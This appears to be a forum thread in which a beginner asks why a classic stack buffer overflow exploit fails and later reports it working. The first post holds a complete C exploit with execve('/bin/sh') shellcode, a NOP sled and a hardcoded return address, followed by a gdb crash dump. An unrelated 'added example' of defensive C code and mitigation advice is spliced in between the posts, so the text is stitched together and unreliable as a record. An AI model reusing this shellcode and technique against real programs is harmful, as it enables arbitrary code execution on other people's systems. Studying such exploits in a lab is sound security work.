
Thread: Buffer overflow exploit not working

  1. #1
    Just burned his ISO
    Join Date
    Jun 2007
    Posts
    6

    Buffer overflow exploit not working

    Hi, I've followed a dozen tutorials about buffer overflow exploiting but none of them seem to work out. Here is one of the example scripts I'm using to exploit an example program:
    Code:
    #include <unistd.h>
    #include <stdlib.h>
    #include <string.h>
    
    /* execve("/bin/sh") shellcode in the classic jmp/call/pop style */
    static char shellcode[]=
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh#";
    
    #define NOP 0x90
    #define LEN (1024+8)    /* parenthesised so that LEN-4 and friends expand as intended */
    #define RET 0xbfffeee0  /* guessed stack address the overwritten return address should point into */
    
    int main()
    {
        char buffer[LEN+1]; int i;   /* +1 for the terminating NUL the argument needs */
    
        /* first fill up the buffer with NOPs */
        for (i=0;i<LEN;i++)
            buffer[i] = NOP;
    
        /* and then the shellcode, placed just before the return-address slot */
        memcpy(&buffer[LEN-strlen(shellcode)-4],shellcode,strlen(shellcode));
    
        /* and finally the address to return to */
        *(int*)(&buffer[LEN-4]) = RET;
    
        /* terminate the string; without this the argument runs past the buffer */
        buffer[LEN] = '\0';
    
        /* run program with buffer as parameter */
        execlp("./vuln","./vuln",buffer,NULL);
    
        return 0;
    }
    Does this have something to do with Backtrack? It seems that I'm overwriting the return address with the esp... I've searched a lot for a solution but I didn't find anything.

    Code:
    bt bof2 # exploit
    string is Ű^1└FF
                    ░
                     ˇ1Ď═Ŕń   /bin/sh#đţ ┐
    Segmentation fault (core dumped)
    bt bof2 # gdb exploit core
    GNU gdb 6.6
    Copyright (C) 2006 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i486-slackware-linux"...
    Using host libthread_db library "/lib/libthread_db.so.1".
    
    warning: core file may not match specified executable file.
    
    warning: Can't read pathname for load map: Input/output error.
    Reading symbols from /lib/libc.so.6...done.
    Loaded symbols for /lib/libc.so.6
    Reading symbols from /lib/ld-linux.so.2...done.
    Loaded symbols for /lib/ld-linux.so.2
    Core was generated by `./vuln '.
    Program terminated with signal 11, Segmentation fault.
    #0  0xbfffeed0 in ?? ()
    (gdb) info registers
    eax            0x415    1045
    ecx            0x400    1024
    edx            0xb7fcc0b0       -1208172368
    ebx            0xbfffef00       -1073746176
    esp            0xbfffeed0       0xbfffeed0
    ebp            0x2368732f       0x2368732f
    esi            0xb8000ce0       -1207956256
    edi            0x0      0
    eip            0xbfffeed0       0xbfffeed0
    eflags         0x210286 [ PF SF IF RF ID ]
    cs             0x73     115
    ss             0x7b     123
    ds             0x7b     123
    es             0x7b     123
    fs             0x0      0
    gs             0x33     51
    I'm new to buffer overflowing and I actually don't see the whole picture, so I'm starting easy, but even that won't work.

    ~Snuffeldog
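Added example, not code from the thread and not the source of ./vuln (which the post does not include): the unbounded copy pattern a tutorial target like ./vuln normally has, shown beside a bounded replacement that refuses oversize input and always NUL-terminates, plus a simple NOP-sled detector of the kind an IDS shellcode rule applies to inputs. BUF_SIZE, the function names and the sample payload are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90
#define BUF_SIZE 1024   /* assumed size of the target's stack buffer; ./vuln's source is not in the thread */

/* Vulnerable pattern a tutorial target typically has: an unbounded strcpy of
 * a command-line argument into a fixed stack buffer. Kept here for contrast
 * only; this program never calls it with oversize input. */
static int vulnerable_copy(const char *arg)
{
    char buf[BUF_SIZE];
    strcpy(buf, arg);                 /* no length check: anything >= BUF_SIZE overflows */
    return (int)strlen(buf);
}

/* Hardened form: reject input that does not fit and always NUL-terminate.
 * Returns the number of bytes copied, or -1 if the input was rejected. */
static int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);          /* n + 1 also copies the terminating NUL */
    return (int)n;
}

/* Wrapper with a small fixed destination so the boundary cases are easy to check. */
static int try_copy(const char *src)
{
    char dst[16];
    return bounded_copy(dst, sizeof dst, src);
}

/* Detection heuristic: the longest run of NOP bytes in a payload. A long run
 * is the signature of the NOP sled the exploit above builds. */
static size_t longest_nop_run(const unsigned char *p, size_t len)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        cur = (p[i] == NOP) ? cur + 1 : 0;
        if (cur > best)
            best = cur;
    }
    return best;
}

/* Constructed sample payload: 32 NOPs followed by 8 filler bytes, no shellcode. */
static size_t sample_sled_len(void)
{
    unsigned char sample[40];
    memset(sample, NOP, 32);
    memset(sample + 32, 'A', 8);
    return longest_nop_run(sample, sizeof sample);
}

int main(void)
{
    char dst[BUF_SIZE];
    const char *short_arg = "hello";

    printf("vulnerable_copy(\"%s\") = %d\n", short_arg, vulnerable_copy(short_arg));
    printf("bounded_copy short     = %d\n", bounded_copy(dst, sizeof dst, short_arg));
    printf("try_copy 16 chars      = %d (rejected)\n", try_copy("0123456789abcdef"));
    printf("longest NOP run        = %zu\n", sample_sled_len());
    return 0;
}
```

The length check is the fix for the bug class itself; the compiler and kernel mitigations that made this kind of fixed-address exploit stop working on later systems (stack canaries via -fstack-protector, non-executable stacks, and stack-address randomisation) are independent of the code and should be left on as well.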

  2. #2
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

  3. #3
    Just burned his ISO
    Join Date
    Jun 2007
    Posts
    6


    I've read that, but it didn't look like my problem as I already got the stack pointer, or don't I? So do I have to get the stack address at runtime as they do in the other topic?

    [EDIT]
    I guess I didn't have the address of the stack pointer, as it does work when I'm using the script in the other topic...
    But anyways, it works now and I'm going to search some more information on finding the stack address =)
    Thanks a lot for your answer ^^
